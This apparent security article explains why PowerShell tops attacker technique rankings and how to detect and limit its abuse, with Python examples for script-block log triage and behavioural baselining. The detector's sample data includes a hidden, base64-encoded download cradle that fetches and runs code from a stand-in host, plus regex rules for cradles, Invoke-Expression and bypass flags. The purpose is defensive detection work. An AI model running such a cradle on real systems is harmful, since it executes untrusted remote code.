How do cyber pros prioritize their security efforts? A good place to start is knowing exactly which tactics, techniques and procedures (TTPs) threat actors use. In a recently published report, aggregated data was used to identify the most common attack techniques as defined by the MITRE ATT&CK framework.

The study revealed that PowerShell Command & Scripting Interpreter was the number one attack technique used by threat actors. PowerShell is a command-line shell and scripting language that is widely used by system administrators and security professionals to automate tasks and manage systems. But threat actors can also use PowerShell to carry out malicious activities on compromised systems.

Top Attack Techniques

The report provides a strong representation of adversary activity from authoritative sources. It assembled data from M-Trends, Red Canary’s Threat Detection Report, CTID ATT&CK Sightings Ecosystem and CISA alerts ranging from 2020 to 2022.

At the top of the list of techniques was PowerShell. As per the report, adversaries that breach a system are likely to start up the PowerShell command-line utility 28.49% of the time. Using this technique, actors can move laterally throughout a network and gain persistence on the compromised machine. Obfuscating files and exploiting public-facing applications were second and third on the list of top techniques used by attackers.

Palo Alto Networks Unit 42 recently reported that the ransomware gang Vice Society is deploying a new, sophisticated PowerShell script attack to automate data theft. Vice Society’s data exfiltrator uses “living off the land” binaries and scripts unlikely to trigger security alerts. This makes it easier for the actors to encrypt data and then demand a ransom.

How Do Attackers Use PowerShell?

PowerShell is both a command-line shell and a scripting language that can execute commands and scripts on a target system. Therefore, a PowerShell cyberattack is a type of command and scripting interpreter attack. In this type of attack, the hacker leverages a legitimate tool built into Windows.

A PowerShell cyberattack typically involves malicious actions such as:

  • Command and Control (C2) Communication: Attackers use PowerShell commands to communicate with their C2 servers, download/execute malware and exfiltrate sensitive data.
  • Credential Theft: PowerShell can be used to extract login credentials (such as passwords or tokens) from a compromised system.
  • Lateral Movement: Attackers can use PowerShell to move laterally within a compromised network, gaining access to additional systems and resources.
  • Fileless Malware: PowerShell can be used to execute fileless malware, which traditional antivirus solutions can struggle to detect.
  • Data Manipulation: PowerShell can be used to modify or delete files, registry keys and other system settings. This can disrupt normal system operations and cause damage to the system.

Living Off the Land

A PowerShell cyberattack is considered to be a type of Living Off the Land (LOTL) attack. LOTL attacks refer to a technique used by attackers to evade detection by using legitimate tools and functionalities already present in the target system. LOTL techniques avoid using malware that can be detected by antivirus software.

PowerShell is a legitimate tool already present on most Windows systems. It has powerful features that attackers can abuse to carry out malicious activities. In this way, attackers do not have to download any additional malware onto the compromised system.

How to Thwart PowerShell Attacks

There are several methods to detect and prevent PowerShell cyberattacks:

  1. Restrict PowerShell Usage: Organizations can restrict PowerShell usage to only authorized users and scripts signed by trusted publishers.
  2. Implement PowerShell Logging and Monitoring: PowerShell generates detailed logs that can help detect suspicious activity. Organizations can enable PowerShell logging and monitor the logs for unusual activity, such as the execution of suspicious commands or scripts.
  3. Endpoint Detection and Response (EDR): EDR solutions monitor system activity and detect suspicious PowerShell activity, such as the execution of known malicious commands or scripts.
  4. Apply Software Updates and Patches: Software updates and patches can remediate many PowerShell vulnerabilities. Companies should ensure that all systems are up-to-date with the latest security patches and updates to fix known PowerShell vulnerabilities.
  5. Implement network segmentation: Network segmentation can limit the impact of a PowerShell attack by restricting the intruder’s ability to move laterally within the network and access sensitive systems and data.
  6. Threat intelligence: Threat intelligence can provide information on known PowerShell-based attacks and indicators of compromise (IOCs). This can be used to detect and block attacks before they can cause damage.
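The logging-and-monitoring and EDR points above come down to reading the script block records PowerShell can emit (Event ID 4104 in the PowerShell Operational log) and looking for indicators. The following is an added example, not code from the report or from any vendor named here, that runs a small rule set over constructed 4104-style records; the user names, the `example.invalid` URL and the rule names are all invented for illustration. It decodes a `-EncodedCommand` payload before matching, so the obfuscation the report ranks second does not hide the indicators.

```python
import base64
import re

# Constructed records shaped like PowerShell Operational log Event ID 4104
# (script block logging) entries: (user, ScriptBlockText). Not real telemetry.
SAMPLE_EVENTS = [
    ("CORP\\admin01", "Get-Service | Where-Object Status -eq 'Stopped'"),
    ("CORP\\svc-backup", "Compress-Archive -Path C:\\Data -DestinationPath D:\\bak.zip"),
    # A download cradle hidden behind -EncodedCommand (UTF-16LE, base64),
    # which the raw log would otherwise show only as an opaque blob.
    ("CORP\\jdoe", "powershell.exe -nop -w hidden -EncodedCommand " + base64.b64encode(
        "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
        .encode("utf-16-le")).decode()),
    ("CORP\\jdoe", "Invoke-Expression (Get-Content .\\build.ps1 -Raw)"),
]

# Indicators that commonly appear in abusive script blocks; each is weak on
# its own, so alerts require several to fire together (see triage()).
RULES = {
    "encoded_command": re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_cradle": re.compile(r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest", re.I),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "hidden_or_bypass": re.compile(r"-w(?:indowstyle)?\s+hidden|-e(?:xecutionpolicy|p)\s+bypass|-nop\b", re.I),
}


def decode_encoded_command(text):
    """Return the decoded -EncodedCommand payload (UTF-16LE), or None."""
    m = re.search(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{20,})", text, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not a valid encoded command; scan the raw text only


def analyze(script_block):
    """Return the names of all rules that fire on the raw text or on the
    decoded payload, so encoding does not hide the indicators."""
    candidates = [script_block]
    decoded = decode_encoded_command(script_block)
    if decoded is not None:
        candidates.append(decoded)
    return {name for name, rx in RULES.items() if any(rx.search(t) for t in candidates)}


def triage(events, threshold=2):
    """Return (user, sorted hits) for records with at least `threshold`
    indicators; a lone Invoke-Expression on a local file stays below it."""
    findings = []
    for user, script_block in events:
        hits = analyze(script_block)
        if len(hits) >= threshold:
            findings.append((user, sorted(hits)))
    return findings
```

Only the encoded record clears the threshold; the plain `Invoke-Expression` on a local build script is recorded but not raised, which is the kind of tuning that keeps a script block feed usable for the team that enabled it.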

Behavioral Analysis vs. PowerShell Attacks

Behavioral analysis and anomaly detection can also be effective in detecting PowerShell-based attacks. These techniques focus on monitoring system behavior and detecting deviations from normal behavior patterns, which can indicate the presence of an intruder using PowerShell.

Behavioral analysis involves creating a baseline of normal system behavior and monitoring the system for any deviations from this baseline. This can involve monitoring user activity, network traffic and system processes to detect unusual behavior that may be indicative of an attack.

Anomaly detection involves using machine learning algorithms to detect unusual activity on the system. These algorithms can identify patterns in system activity and alert security teams to any deviations from these patterns. This can help detect PowerShell cyberattacks that involve unusual patterns of system activity.
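The baseline-and-deviation idea from the two paragraphs above, as an added example that is not from the report or any product named on this page: a per-user profile of daily PowerShell activity is built from a constructed two-week window, and the day under review is scored against it. The user names and counts are invented; the floor on the standard deviation handles the perfectly regular service account, which would otherwise divide by zero and alert on a single extra invocation.

```python
import statistics

# Constructed baseline: PowerShell process starts per user per day over a
# two-week "known good" window, as a team would derive from process-creation
# or script block logs. Not real telemetry.
BASELINE = {
    "CORP\\admin01": [40, 38, 45, 41, 39, 44, 42, 40, 37, 43, 41, 39, 42, 40],
    "CORP\\svc-backup": [12] * 14,   # a scheduled job: perfectly regular
    "CORP\\jdoe": [0, 1, 0, 0, 2, 0, 1, 0, 0, 0, 1, 0, 0, 1],
}

# Constructed counts for the day under review.
TODAY = {
    "CORP\\admin01": 44,
    "CORP\\svc-backup": 13,
    "CORP\\jdoe": 35,          # a desktop user suddenly scripting heavily
    "CORP\\tmp-user": 3,       # never seen running PowerShell before
}


def profile(counts, std_floor=1.0):
    """Mean and standard deviation of a user's daily counts. The floor stops
    a perfectly regular service account (std = 0) from producing a division
    by zero and from alerting on a one-off change of a single invocation."""
    mean = statistics.fmean(counts)
    std = statistics.stdev(counts) if len(counts) > 1 else 0.0
    return mean, max(std, std_floor)


def detect_deviations(baseline, today, z_threshold=3.0):
    """Return {user: (reason, z)} for users whose count is an outlier against
    their own profile, or who have no profile at all (first seen)."""
    findings = {}
    for user, count in today.items():
        if user not in baseline:
            findings[user] = ("first_seen", None)
            continue
        mean, std = profile(baseline[user])
        z = (count - mean) / std
        if z > z_threshold:
            findings[user] = ("spike", round(z, 1))
    return findings
```

The administrator's slightly busier day stays inside their own spread, while the desktop user's jump and the unknown account both surface, which is the distinction a static "more than N PowerShell launches" rule cannot make.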

Should PowerShell be Disabled?

Experts advise against disabling PowerShell as it is a useful command-line interface for Windows. PowerShell can help with forensics, incident response and automating desktop tasks, according to joint advice from the National Security Agency and CISA.

The U.S. Department of Defense also advises against removing PowerShell. As per the DoD, blocking the interface hinders the defensive capabilities that current versions of PowerShell can provide. Removing it also prevents components of Windows from running properly.

While PowerShell is a useful tool, it is also the number one technique attackers use to carry out LOTL attacks. Organizations should be aware of the risks associated with PowerShell and take steps to protect their systems against these types of attacks.
